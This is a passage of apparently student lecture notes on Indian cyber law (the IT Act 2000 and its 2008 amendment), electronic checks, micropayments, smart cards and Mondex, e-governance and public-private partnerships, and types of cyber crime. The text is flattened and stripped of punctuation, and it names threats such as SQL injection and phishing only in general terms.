which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
